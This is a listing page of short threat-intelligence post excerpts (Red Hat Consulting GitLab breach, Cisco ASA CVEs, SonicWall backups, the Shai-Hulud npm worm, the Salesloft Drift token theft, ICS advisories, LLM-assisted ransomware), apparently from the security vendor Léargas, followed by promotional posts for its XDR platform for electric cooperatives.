Category: Threat Intelligence

Red Hat disclosed on October 2, 2025 that a third party accessed a GitLab instance used for internal collaboration by Red Hat Consulting in select engagements; Red Hat removed access, isolated the instance, involved authorities, and is continuing the investigation. The company emphasized the incident is confined specifically to that Consulting GitLab environment. [1][2]. (redhat.com) Who claims what A group calling itself Crimson Collective

As of September 26, 2025, CISA’s ED 25‑03 mandates immediate action to identify and mitigate potential compromise of Cisco ASA and Firepower devices amid an active campaign chaining CVE‑2025‑20362 (missing authorization) with CVE‑2025‑20333 (RCE). Cisco also disclosed CVE‑2025‑20363 (web services RCE) across ASA/FTD and IOS families. Patching is available. CISA set aggressive deadlines: core dump submissions and urgent upgrades by September 26, 2025, and

As of September 18, 2025, SonicWall advises impacted customers to perform a MySonicWall breach password reset and rotate other secrets after threat actors accessed some cloud‑stored firewall configuration backups. SonicWall reports fewer than 5% of firewalls had backup preference files accessed; credentials in those files were encrypted; no leak evidence is known and this was not a ransomware event, but brute-force activity against the

As of September 18, 2025, organizations that build or run JavaScript software face a high‑risk supply chain incident: the Shai‑Hulud npm worm is actively compromising maintainer accounts, inserting a malicious postinstall bundle.js into popular packages, harvesting tokens and secrets, and mass‑migrating private GitHub repositories to public. Evidence shows large‑scale propagation and data exposure; no CVE/KEV entry applies because this is a campaign, not a

A coordinated data theft campaign leveraged compromised OAuth access and refresh tokens tied to the Salesloft Drift integration to pull large datasets from many organizations’ Salesforce instances. Google’s Threat Intelligence Group (GTIG) attributes the activity to UNC6395 and observed systematic SOQL querying focused on harvesting credentials and secrets from CRM records. The activity window runs from at least August 8 to August 18, 2025;

On August 28 2025, CISA published nine advisories covering Mitsubishi Electric, Schneider Electric, Delta Electronics, GE Vernova, and Hitachi Energy. Several issues are remotely exploitable with low attack complexity; patches exist for many products, while some Mitsubishi Electric PLC weaknesses require compensating controls only. No known public exploitation is reported as of August 28, 2025 [1]. (cisa.gov) Overview These ICS advisories span PLCs, HMI/SCADA

AI-powered ransomware has moved from hypothetical to here-and-now. Public reporting by ESET and other industry outlets describes the first known case of ransomware produced with the help of a large language model (LLM), demonstrating that generative AI can compress development time and lower the skill threshold for cybercrime. While the sample analyzed was not unprecedented in capability, its existence is a watershed for defenders:

In today's digital age, safeguarding critical infrastructure is more crucial than ever. However, many organizations are grappling with cybersecurity challenges due to limited budgets, insufficient staffing, and outdated solutions. Enter Léargas-a comprehensive SaaS cybersecurity platform designed to address these pressing issues and revolutionize how critical infrastructure is protected.

We are thrilled to announce the upcoming release of Léargas v0.1.0-beta.4! This update introduces several significant enhancements and new features aimed at improving user experience, security, and operational efficiency across the platform. Here's a sneak peek into what's new: Switching between devices has never been easier. With multi-device session support, you can effortlessly continue your sessions without any disruptions, providing convenient access to Léargas from anywhere. This feature enhances user experience by ensuring seamless transitions across devices.

In 2014, the pressing need for a comprehensive cybersecurity solution to the vulnerabilities faced by nearly 900 electric cooperatives was acknowledged by the U.S. Department of Energy (DOE). Understanding that the integration of Extended Detection and Response (XDR) solutions in electric cooperatives has become increasingly important in recent years, Léargas was driven to create a versatile and cost-effective platform. As these cooperatives digitally transform and adopt modern technologies, they also become more vulnerable to sophisticated cyber threats. These potential attacks not only pose a risk to the integrity of the cooperatives' data, but also threaten the stability of the electrical grid that powers our communities.

The fusion of Information Technology (IT) and Operational Technology (OT) ecosystems is increasingly becoming integral in today's enterprises. As the cyber threat landscape continues to evolve, posing intricate and sophisticated attacks, organizations are turning to advanced security solutions such as Leargas Security XDR. This potent platform, built on the robust Zeek framework, offers an all-in-one approach to securing IT and OT environments, providing vital insights and capabilities that help businesses stay ahead of potential threats.

As the globe becomes progressively dependent on digital systems and automation, cybersecurity has evolved into a pressing issue for all organizations. This trend is not just applicable to major corporations or tech firms; it is equally relevant to entities like energy cooperatives. Given their key responsibility in delivering vital services to communities, these cooperatives cannot afford to overlook the importance of robust cybersecurity measures.